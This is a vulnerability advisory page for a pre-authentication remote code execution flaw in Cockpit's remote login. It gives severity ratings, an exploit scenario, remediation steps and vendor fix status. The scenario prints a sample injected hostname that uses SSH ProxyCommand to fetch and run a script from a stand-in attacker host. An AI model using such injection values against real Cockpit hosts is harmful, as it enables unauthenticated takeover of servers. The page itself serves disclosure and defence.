EUVD-2026-19814Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Primary rating from NVD.
CVSS VectorNVD
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
3DescriptionCVE.org
Cockpit's remote login feature passes user-supplied hostnames and usernames from the web interface to the SSH client without validation or sanitization. An attacker with network access to the Cockpit web service can craft a single HTTP request to the login endpoint that injects malicious SSH options or shell commands, achieving code execution on the Cockpit host without valid credentials. The injection occurs during the authentication flow before any credential verification takes place, meaning no login is required to exploit the vulnerability.
AnalysisAI
Remote code execution in Cockpit's web interface allows unauthenticated attackers to execute arbitrary commands on the host system by injecting malicious SSH options through the login endpoint. Affecting Red Hat Enterprise Linux versions 7 through 10, this critical pre-authentication vulnerability (CVSS 9.8) requires no credentials and executes code before any authentication checks occur. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Remote unauthenticated attacker with network access to Cockpit web service. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | This vulnerability represents critical real-world risk based on convergent threat signals. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker identifies an internet-facing Red Hat Enterprise Linux server running Cockpit on the default port 9090 through network scanning. Without any valid credentials, the attacker crafts an HTTP POST request to the Cockpit login endpoint, supplying a malicious hostname parameter containing SSH ProxyCommand injection such as '-oProxyCommand=curl http://attacker.com/payload.sh|bash' or embedding shell metacharacters in the username field to break out of the SSH command context. … |
| Remediation | Organizations should immediately consult Red Hat's official security advisory at https://access.redhat.com/security/cve/CVE-2026-4631 for patched package versions and apply vendor-supplied updates through standard RHEL package management (yum/dnf update cockpit). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Inventory all Cockpit deployments across RHEL 7-10 systems and immediately restrict network access to Cockpit web interface (default port 9090) to trusted networks only via firewall rules or network segmentation; disable Cockpit service on internet-facing systems if operationally feasible. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Vendor StatusVendor
SUSE
Severity: Critical| Product | Status |
|---|---|
| SUSE Liberty Linux 10 | Fixed |
| SUSE Liberty Linux 9 | Fixed |
| SUSE Linux Micro 6.2 | Fixed |
| openSUSE Tumbleweed | Fixed |
| SUSE Linux Enterprise Server 16.0 | Affected |
| SUSE Linux Enterprise Micro 5.2 | Fixed |
| SUSE Linux Enterprise Micro 5.3 | Fixed |
| SUSE Linux Enterprise Micro 5.4 | Fixed |
| SUSE Linux Enterprise Micro 5.5 | Fixed |
| SUSE Linux Enterprise Server 16.0 | Fixed |
| SUSE Linux Enterprise Server 16.1 | Fixed |
| SUSE Linux Enterprise Server for SAP applications 16.0 | Fixed |
| SUSE Linux Enterprise Server for SAP applications 16.1 | Fixed |
| SUSE Linux Micro 6.0 | Fixed |
| SUSE Linux Micro 6.1 | Fixed |
| SUSE Linux Micro 6.2 | Fixed |
Share
External POC / Exploit Code
Leaving vuln.today